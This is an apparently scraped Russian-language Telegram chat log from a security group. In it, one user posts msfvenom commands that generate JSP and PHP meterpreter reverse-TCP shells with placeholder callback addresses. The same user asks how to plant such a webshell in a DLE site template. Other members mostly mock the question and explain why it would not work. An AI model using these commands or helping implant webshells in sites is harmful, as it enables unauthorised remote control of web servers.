В рейтинге участвует:

групп:

каналов:

Виртуальный сервер на SSD - недорого!

Аренда выделенных и виртуальных серверов (VDS/VPS), хостинг, аренда IP-адресов, администрирование, круглосуточная поддержка

qwarta.ru подробнее

Резервное копирование с проверкой на вирусы!!!

Удобный сервис создания резервных копий на любой сервер сети интернет. Отслеживайте изменения, проверяйте на вирусы. Надежно защитите свой бизнес!

go.backupland.com

Выбираете сервер? Любая конфигурация на заказ!

Аренда физических серверов любых конфигураций под любые запросы - 1С бухгалтерия, игровые сервера, нагруженные проекты, интернет-магазины!

qwarta.ru подробнее

Size: a a a

secinfosec

2267 membersпожаловаться на группу
2020 November 25

⠀⠀

⠀ ⠀ ⠀ ⠀ in secinfosec
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

Если сгенерированный выше JavaScript код внести на страницу сайта он отработает как webshell ? 🤔
источник
08:16пожаловаться#1

a6

admin 666admin in secinfosec
jsp и яваскрипт это две разные вещи, отобразится если сервак исполняет ява-аплеты в root directory где лежит index
источник
08:19пожаловаться#2

Z

Zer🦠way in secinfosec
video.mp4
(264.39 Кб)
источник
08:21пожаловаться#3

⠀⠀

⠀ ⠀ ⠀ ⠀ in secinfosec
admin 666admin
jsp и яваскрипт это две разные вещи, отобразится если сервак исполняет ява-аплеты в root directory где лежит index
Вообще логика есть в этом или изначально бред ?
источник
08:21пожаловаться#4

Z

Zer🦠way in secinfosec
⠀ ⠀ ⠀ ⠀
Вообще логика есть в этом или изначально бред ?
бред
источник
08:21пожаловаться#5

AK

Anton Kirsanov 🐸 in secinfosec
источник
08:22пожаловаться#6

⠀⠀

⠀ ⠀ ⠀ ⠀ in secinfosec
А код сгенерированный на пхп исполнится ?
источник
08:23пожаловаться#7

D

Dmitry in secinfosec
ой, ну перепутал человек джаву и джаваскрипт, а тут сразу наркоманом называют
источник
08:23пожаловаться#8

⠀⠀

⠀ ⠀ ⠀ ⠀ in secinfosec
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
источник
08:23пожаловаться#9

⠀⠀

⠀ ⠀ ⠀ ⠀ in secinfosec
⠀ ⠀ ⠀ ⠀
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
Код в shell.php если внести на какую либо страницу сайта он отработает как веб шелл ?
источник
08:23пожаловаться#10

AK

Anton Kirsanov 🐸 in secinfosec
добавь через пайп вызов acdsee и прожигание компакт диска
источник
08:24пожаловаться#11

AK

Anton Kirsanov 🐸 in secinfosec
возможно отработает
источник
08:24пожаловаться#12

q

qap in secinfosec
Anton Kirsanov 🐸
добавь через пайп вызов acdsee и прожигание компакт диска
Потом метать как сюрекен?
источник
08:24пожаловаться#13

Z

Zer🦠way in secinfosec
Anton Kirsanov 🐸
добавь через пайп вызов acdsee и прожигание компакт диска
надо сначала бряки поставить
источник
08:25пожаловаться#14

⠀⠀

⠀ ⠀ ⠀ ⠀ in secinfosec
Anton Kirsanov 🐸
добавь через пайп вызов acdsee и прожигание компакт диска
Это кажется я уже пробовал ) не работает
источник
08:25пожаловаться#15

D

Dmitry in secinfosec
⠀ ⠀ ⠀ ⠀
Код в shell.php если внести на какую либо страницу сайта он отработает как веб шелл ?
если ты всё еще пытаешься выполнить код в шаблоне DLE, то там эти способы не сработают
источник
08:26пожаловаться#16

a6

admin 666admin in secinfosec
⠀ ⠀ ⠀ ⠀
Вообще логика есть в этом или изначально бред ?
Не, ну теоретически в ява аплет можно запихнуть что-то на яваскрипте, но наоборот очень геморно. Чтобы jsp shell отработал, сервер должен уметь исполнять ява-аплеты (tomcat,jboss, apache mod_jk, glassfish, wildfly и т.д.)
источник
08:26пожаловаться#17

⠀⠀

⠀ ⠀ ⠀ ⠀ in secinfosec
Dmitry
если ты всё еще пытаешься выполнить код в шаблоне DLE, то там эти способы не сработают
😐
источник
08:26пожаловаться#18

AK

Anton Kirsanov 🐸 in secinfosec
Zer🦠way
надо сначала бряки поставить
там еще пара ассемблерных вставок через bash -c должна быть и попищать динамиком
источник
08:26пожаловаться#19

⠀⠀

⠀ ⠀ ⠀ ⠀ in secinfosec
Dmitry
если ты всё еще пытаешься выполнить код в шаблоне DLE, то там эти способы не сработают
Тут прикалываются вон на меня такие короче все умные , а как в шаблон простой cms внести шелл хрен кто знает 🤨
источник
08:27пожаловаться#20